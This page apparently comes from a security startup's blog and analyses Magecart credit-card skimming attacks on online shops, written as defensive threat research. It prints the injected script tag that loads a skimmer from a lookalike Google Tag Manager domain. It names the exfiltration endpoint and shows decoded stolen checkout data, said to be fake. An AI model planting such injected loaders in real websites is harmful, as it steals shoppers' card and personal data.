
We are happy to announce we have been selected to be part of the Citi Accelerator Class 9 program

March 6, 2019 in Announcements

We are happy to announce that we have been selected for the Citi Accelerator Class 9 program. To learn more: ps://www.linkedin.com/pulse/meet-citi-accelerator-class-9-rachel-fabian-edelman/

About Citi Accelerator:

Citi Accelerator offers Fintech, Data Analytics, AI, Cyber Security and Enterprise startups the opportunity to gain unique access to Citi worldwide as well as to its network.

The program is geared toward building a thriving ecosystem, and as such it is free of charge; the program does not take equity or commit to investing in the participating companies.

Data Breach. A Real World Example

January 20, 2019 in Data Breach, Magecart

We put a lot of thought into our data breach detection engine, a real-time production monitoring solution built from three main layers that combine human-written intelligence logic with our AI anomaly detection. This gives us the tools to detect known threats and to prepare for future attacks.

Last month our team discovered dozens of sites with live credit card skimmers, which we identified as Magecart activity, including one of the largest consumer electronics retailers in the UK and a well-known sports apparel brand from France. We alerted the relevant CISOs, who immediately acted to secure their customers' information.

As a result, we now have new clients and have grown our bank of authentic attacks, from which I am going to share an example.

To demonstrate the flow of the malicious activity, we will walk through a live example of one of the data breaches identified by our external monitoring solution, Intelligence Pro. To protect our clients' privacy, we will not share their identity, and site information will not be disclosed.

To keep this post short, I also will not go into how the malicious JavaScript was injected in the first place; I will just point out that this is not a difficult step, given the first- and third-party vulnerabilities present on the client side.

The malware is embedded locally at the end of every known page of the site via the following script tag. Note the domain: googletagmanager.eu is a lookalike of the legitimate Google Tag Manager domain, googletagmanager.com.

<script src="https://googletagmanager.eu/gtm.js"></script>

This tag loads a remote script that is a generic e-commerce credit card skimmer belonging to the Magecart family of attacks. The script contains the full malicious code, which steals the following data and sends it to the attacker's server:

  • Credit card number, expiration date, CVV code
  • Full name
  • Billing address
  • Shipping address

This is a known card skimmer operating from a malicious server at hxxps://googletagmanager.eu: hxxps://googletagmanager.eu/gtm.js delivers the skimming code, and once the data has been collected, the script sends the user's personal information and card details to hxxps://www.googletagmanager.eu/ga.js, a path that mimics the name of the legacy Google Analytics library. This can be seen in the image below:

To hide the leak, the stolen data is passed through a simple encoding before it is sent, a common obfuscation method that is trivial to reverse:

Original Skimming Form Data:


Decoded Skimming Form Data: all of the personal information entered during the purchase flow, including the credit card details (all of the information shown is random/fake):

nullbilling_address_id=12608&billing[address_id]=262762&billing[firstname]=Alvin&billing[lastname]=Neal&billing[taxvat]=743.599.320-49&billing[telephone]=(457) 309-2591&billing[postcode]=21321-123&billing[street][]=Nifok Gln&billing[street][]=1245 &billing[street][]=Nifok Gln&billing[street][]=1245&billing[city]=Rio&billing[region_id]=489&billing[country_id]=BR&billing[save_in_address_book]=1&billing[use_for_shipping]=1&shipping_address_id=12608&shipping[address_id]=262763&shipping[firstname]=Alvin&shipping[lastname]=Neal&shipping[telephone]=(457) 309-2591&shipping[postcode]=21321-123&shipping[street][]=Nifok Gln&shipping[street][]=1245 &shipping[street][]=Nifok Gln&shipping[street][]=1245&shipping[city]=Rio&shipping[region_id]=489&shipping[country_id]=BR&shipping[save_in_address_book]=1&shipping[same_as_billing]=1&shipping_method=mp_multi_shipping_mp_multi_shipping&selected_shipping[1155][items]=156969&form_key=5yFyPLqjpgEFJ99G&payment[method]=mercadopago_custom&=Aplicar&payment[mercadopago_custom][paymentMethodSelector]=-1&=4111111111111111&payment[mercadopago_custom][cardExpirationMonth]=4&payment[mercadopago_custom][cardExpirationYear]=2023&payment[mercadopago_custom][cardholderName]=Alvin Neal&=654&payment[mercadopago_custom][docType]=CPF&payment[mercadopago_custom][docNumber]=72535534622&payment[mercadopago_custom][issuer_id]=-1&payment[mercadopago_custom][installments]=1&payment[mercadopago_custom][site_id]=MLB&payment[mercadopago_custom][amount]=92&payment[mercadopago_custom][total_amount]=92&payment[mercadopago_custom][paymentMethodId]=visa&payment[mercadopago_custom][token]=f4ce14ab9d83404d93adfd84af6a0b79&payment[mercadopago_custom][cardTruncated]=4111 11** **** 1111&payment[mercadopago_custom][customer_id]=395923734-RyFnhEbljk8ybu&form_key=5yFyPLqjpgEFJ99G&

ChameleonX Intelligence Pro detected this data breach immediately once the external site scan was activated. While this is quite a simple form of attack, it is unknown how long it had been active before our detection.

Detection time is a critical factor. Similar Magecart attacks have made the news globally, hitting large brands such as British Airways, Ticketmaster and Newegg, and in those cases the time to detection averaged 30 to 45 days.

In today's web business environment, where businesses rely on third-party services to grow, supply chain attacks are nearly impossible to prevent outright: the site owner has no control over a vendor's security practices or its obligations to customer privacy. This makes detection time a crucial factor in limiting the impact of a data breach.

Dissecting a Magecart Operation

December 28, 2018 in Data Breach, Magecart

At ChameleonX we deal with many cases of client-side data breach attacks, carried out quietly by fraudsters. These client-side attacks are triggered by a single-line script tag embedded in the body of the website, on the pages where sensitive information is entered.

Compromised Customer Credit Cards, Worldwide

A few days ago, our research led us to discover 11 different Magento e-commerce websites, from all around the world, that currently have live credit card skimmers embedded in them. The attacks are rather similar to one another and apparently belong to the same Magecart group, sharing C2 servers and reusing code.

Some of the websites on the list have monthly traffic of 100K to 300K unique visitors (one of them is an Amazon best-selling company), and they belong to SMB and mid-market companies with dozens to hundreds of employees. We will not reveal the names of these companies, for obvious reasons, but you can rest assured that we contacted all of them and most have already removed the credit card skimming malware.


Estimated monthly visits of an infected e-commerce site (stats by SimilarWeb.com)

Data Exfiltration with a Disguise

The operation discussed in this post uses lookalike domains for its C2 servers in order to keep a low footprint and evade detection by website owners and users. The analyzed attacks used domains camouflaged as services such as:

  • Google Analytics
  • Google Tag Manager
  • Bootstrap
  • React


Exfiltrated credit card data from a large e-commerce website, infected with a Magecart card skimmer, sent to the fraudster’s C2 server

Card skimmer Javascript code

You get the picture. Imagine inspecting your website's network traffic and seeing an outgoing request to a domain like googletagmaanager.com: if you are not actively looking for a threat, you would probably assume it is a legitimate request from your GTM library, right?

The C2 Endpoint

Once the compromised e-commerce websites had been identified, we started to look into the C2 servers themselves to see what intelligence we could gather. The C2 server is where the victim's browser fetches the injected JavaScript from, and where the skimmer reports back with the stolen data (the victim's personal details, credentials, credit card data and more).

One of the core principles of research is persistence. You need to be committed to what you do and analyze many different attacks until the answer is found. After many attempts, researchers at ChameleonX managed to obtain the PHP web shell script used by Magecart fraudsters for remote code execution and for modifying website resources such as JavaScript libraries and HTML files.

Real Magecart Webshell backdoor script obtained from a C2 server


An illustration of a code injection attack flow

Attackers exploit a variety of vulnerabilities to deploy this shell on a website. Once it is in place and they have its remote access URL, fraudsters can control most aspects of the server, which lets them inject malicious code into the client-side runtime and modify the site that is served to end users.


ChameleonX is a cybersecurity startup company, developing a unique AI-based client-side protection solution for the eCommerce, Travel and Financial sectors to protect businesses from zero-day attacks, compromised 3rd-party resources, web vulnerabilities and malware code injections. Learn more about how we can protect your company from becoming the next big data breach news story.